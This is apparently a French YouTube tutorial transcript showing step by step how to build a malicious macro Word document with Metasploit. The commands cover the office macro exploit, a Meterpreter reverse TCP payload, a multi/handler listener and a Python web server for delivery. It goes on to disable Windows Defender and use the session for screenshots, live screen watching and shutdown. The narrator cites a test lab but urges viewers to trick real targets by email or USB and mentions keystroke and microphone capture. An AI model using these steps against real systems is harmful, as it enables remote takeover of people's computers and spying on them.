Et bonsoir et bienvenue dans cette vidéo. Donc aujourd'hui nous allons apprendre comment les pirates font pour prendre le contrôle de votre PC grâce à un fichier Word. Ce fichier sera créé avec Metasploit, donc et l'écoute aussi va être lancé sur Metasploit. Donc aujourd'hui nous allons exclusivement utiliser Metasploit pour cette attaque. Donc sans plus tarder, on va passer à la partie pratique. Donc on va lancer Metasploit avec la commande msf console. Donc là, c'est bon, Metasploit est lancé. Donc on va utiliser l'exploit suivant. Donc use exploit multi-file format. Ensuite Office macro. Donc c'est bon. Donc c'est cet exploit-là qu'on va utiliser. Donc si vous regardez bien, donc il a pris l'exploit en compte. Ensuite, il nous a dit que le payload par défaut, c'est du Windows Meterpreter Reverse TCP. Donc ça, on va laisser ça comme ça. Donc c'est ce payload-là qu'on veut. Ensuite, on va voir les options que prend donc cet exploit. Donc on met chez Option, entrée. Donc ici, on voit que le host a été renseigné. Donc c'est l'IP de notre machine Kali. Le L port, donc on peut le changer, mais on peut laisser ça comme ça aussi. C'est pas grave. Donc on va aller voir les autres options. Donc ici, la seule option qui est requise, c'est le nom du fichier, le file name. On peut laisser aussi par défaut, donc comme ça on aura un fichier de sortie qui va s'appeler msf.docm. Donc on va choisir nous-mêmes le nom de fichier. Ensuite on va lui donner l'extension .docm. Donc c'est ça qu'on va faire ici. Donc ici on va mettre cette file name donc pour donner un nom de fichier. Donc je vais l'appeler hackahmed par exemple .docm. Donc là c'est bon. Ensuite, je vais utiliser la commande run ou bien exploit pour créer donc le fichier qui est malveillant quoi. Donc qui va s'appeler hackahmed.docm. Donc c'est ce fichier là qu'on va essayer d'envoyer à notre cible. Donc on met la commande run. Donc, là on patiente. Donc le fichier est créé et se trouve sur home kali.msf4 local. Donc le fichier s'appelle hackahmed.docm. Donc, ce que je vais faire, je vais donc copier le fichier sur le dossier hackahmed. Donc, ça sera beaucoup plus simple. Donc, je sélectionne le chemin complet du fichier. Ensuite, je le copie. Donc, je vais ouvrir notre terminal avec CTRL-SHIFT-T. Ensuite, je vais mettre la commande cp ou bien move. Donc, je vais le déplacer sur le dossier Kali. Donc, je vais mettre sudo. Donc, move suivi du chemin du fichier. Ensuite, je vais le déplacer sur home Kali. Donc là, je vais laisser le nom hackahmed.docm. Donc je mets entrée, je mets le mot de passe de Kali et là c'est bon. Donc je suis sur home Kali. Si je mets pwd, donc si je mets ls, normalement j'ai le fichier hackahmed.docm ici. Donc voici le fichier. Donc c'est un fichier Word. Donc on va essayer de le transférer donc à notre cible. Donc pour cette partie, c'est à vous de voir donc la manière dont vous allez faire donc pour faire parvenir ça à votre cible. Donc c'est à vous de voir ça, soit via une clé USB ou bien par mail, etc. Donc ça c'est à vous de voir comment vous allez faire pour le faire parvenir à votre cible. Donc ici, comme on est dans un environnement de test, là ce que je vais faire, je vais lancer donc un serveur web ici sur ce dossier. Donc ensuite, je vais aller sur la machine cible et récupérer le fichier hackahmed.docm. Donc c'est ça que je vais faire ici. Mais avant ça, donc je vais aller lancer l'écoute sur Metasploit. Donc je mets use exploit multi-handler. Donc je lance l'écoute. Donc là, je vais spécifier le payload. Donc par défaut, il nous donne le payload générique shell reverse TCP. Ce payload-là ne va pas nous enrager, donc on va donc lui spécifier le payload. On va prendre le payload que Metasploit avait fourni lors de la création du fichier hackahmed.docm. Donc je vais copier ce payload-là. Donc je pouvais aussi voir les payloads qu'il nous propose d'abord. Donc je mets show payload. Donc il y aura énormément de payloads ici. Voilà, il y a énormément de payloads ici. Mais comme nous on connaît donc le payload qui nous intéresse, donc on va le mettre directement. Donc pour
renseigner le payload, donc je mets cette payload suivi du payload que j'avais copié tout à l'heure. Je peux maintenant voir les options qui restent, donc je mets sur option. Donc ici, il nous reste le host et le port. Donc le port doit être donc le port qui a été renseigné lors de la création du fichier hackermed.docm. Donc par défaut, on avait vu que c'était le 4444. Ici aussi, c'est le 4444. Donc ici, on ne va pas y toucher. Donc on va juste renseigner ici le host. Donc pour cela, on met la commande set lhost suivi de l'adresse IP de ma machine Kali 192.168.106.137. Donc là, c'est bon. À partir de là, on est bon. Donc je peux lancer l'écoute avec exploit. Donc ici, vous voyez que je suis en écoute sur le port 4444. Donc c'est bon. Donc je reviens sur le dossier où est donc mon fichier hackermed.docm que je dois envoyer à ma cible. Donc je vais créer ici un serveur web donc qui va me permettre donc de pouvoir récupérer le fichier hackermed.docm une fois sur la machine cible. Donc je suis dans un environnement de test, les deux machines m'appartiennent. C'est pourquoi je passe par cette méthode là. Mais dans votre cas, si vous voulez tromper votre cible, donc il faut utiliser d'autres méthodes. Donc ici, je vais mettre en place un serveur Python. Donc pour cela, j'utilise la commande suivante. Donc python-m http.server suivi du port 8080 et je lance. Donc je vais basculer sur ma machine Windows. Donc sur la machine Windows, donc pour que cette attaque marche aussi, il faudra que votre protection antivirale soit désactivée. Donc comme sur l'autre vidéo quoi, donc qu'on avait faite sur cette scène. Donc ici je vais désactiver la protection antivirale. Pour cela je vais chercher Defender ici, Windows Defender, on va le désactiver. On va aller sur paramètres. Donc la protection en temps réel, on va le désactiver ici. C'est bon. Maintenant ma protection antivirale est désactivée. Donc je peux lancer donc un navigateur et aller récupérer le fichier hackermed.docm sur ma cible. Donc sur la machine Kali dimanche. D'accord, une fois le navigateur lancé, donc là on va mettre l'IP de notre machine Kali 192.168.106.137. Ensuite le port 8080. Donc 2.8080 quoi. Donc là je mets entrée. Donc ici je suis sur le dossier Home Kali. Donc là je vais aller rechercher donc le fichier hackermed.docm. Donc je vais essayer de télécharger ici. Donc il faut cliquer ici sur le fichier hackermed.docm. Donc on le télécharge. Donc ensuite on va aller sur téléchargement. Donc là je suis sur téléchargement. Vous voyez que c'est un fichier Word. Donc si je mets ça une grande icône ici, un très grande icône, vous avez vu que c'est un fichier Word quoi. Comme l'écoute est lancée, donc là je peux directement donc double-cliquer sur le fichier. Donc l'écoute est toujours là. Donc je vais double-cliquer sur le fichier et là vous allez voir que je vais recevoir un reversal m'interpréteur sur la machine Windows 10. Donc je vais mettre un double-clic ici. Donc j'ouvre le fichier. Donc là je vais cliquer sur exécuter quand même. Donc là le fichier s'ouvre. Donc ici c'est bon. Le fichier est ouvert. Donc il faudra activer ici. Donc ici enable content. Il faudra cliquer ici pour activer. Donc et là si je reviens sur la machine Kali, vous allez voir que j'ai reçu une connexion m'interpréteur sur la machine Windows. Donc ici si vous regardez bien, on a une session donc m'interpréteur sur la machine. Donc 192.168.106.135 qui est la machine Windows. Donc à partir de là, on peut commencer à exécuter des commandes post-exploitation. Donc là, on est bel et bien sur la machine Windows. Donc je peux taper la commande sysinfo pour voir les informations de la cible, la machine cible. Donc, je mets entrée. Donc ici, on a le nom du PC, donc le système d'exploitation, l'architecture, la langue, etc. Vous pouvez vous référer à ma dernière vidéo. Donc là, j'ai entré un peu en profondeur sur les commandes post-exploitation. Donc ce que vous pouvez faire, donc comme vous les captures d'écran sur l'écran de la cible, et le fait de voir aussi en temps réel donc ce que la cible fait, le fait de récupérer ce que la cible tape, le fait d'enregistrer son micro. On avait utilisé quelques commandes post-exploitation pour vous montrer donc ce que un attaquant peut faire une fois qu'il a la main sur votre machine via
donc une connexion interpréteur. Donc ici, ce que je vais essayer de faire, je vais essayer de capturer l'écran de la cible avec la commande screenshot. Donc là, je récupère donc l'image. Donc je vais l'ouvrir sur le navigateur. Donc là, c'est bon. Donc vous voyez la capture d'écran, c'est ce qui est ouvert sur la cible. Donc je vais aller fermer ici ou bien réduire la fenêtre. Ensuite, je vais essayer de faire un screenshot donc pour voir en temps réel ce que fait ma cible. Je vais lancer la commande screenshot. Donc screen share, c'est bon. Donc là, vous voyez qu'on a en temps réel ce que la cible fait, quoi. Par exemple, si j'ouvre le dossier téléchargement ici, donc si je reviens sur ma machine Kali, donc vous allez voir le dossier téléchargement ouvert ici. Donc tout ce qu'il fait en temps réel, on récupère. Donc pour les autres commandes, donc il faut vous référer donc à ma dernière vidéo. Donc où j'ai bien expliqué donc plusieurs commandes. Donc il faudra aller là-bas, donc revoir la vidéo. Donc surtout la dernière partie de la vidéo. Donc c'est là où on a exploré les commandes post-exploitation. Donc ce que je vais faire maintenant, je vais éteindre la machine avec la commande shutdown et terminer ainsi cette vidéo. Donc si je mets shutdown, donc si je reviens sur la machine Windows, vous allez voir que la machine est en train de s'éteindre, quoi. Donc c'était ça la vidéo. Donc vous voyez comment on peut prendre le contrôle d'un PC grâce à un fichier Word. Donc pour la prochaine vidéo, donc on va essayer de le faire avec un fichier Excel. Donc la remarque que j'ai faite, donc c'est que j'ai vu qu'il y a beaucoup de vues donc sur mes vidéos, donc mais le nombre d'abonnés n'évolue pas. Donc abonnez-vous sur la chaîne donc et cliquez sur la cloche de notification parce qu'il y a d'autres vidéos beaucoup plus intéressantes qui arrivent. Donc merci et à la prochaine.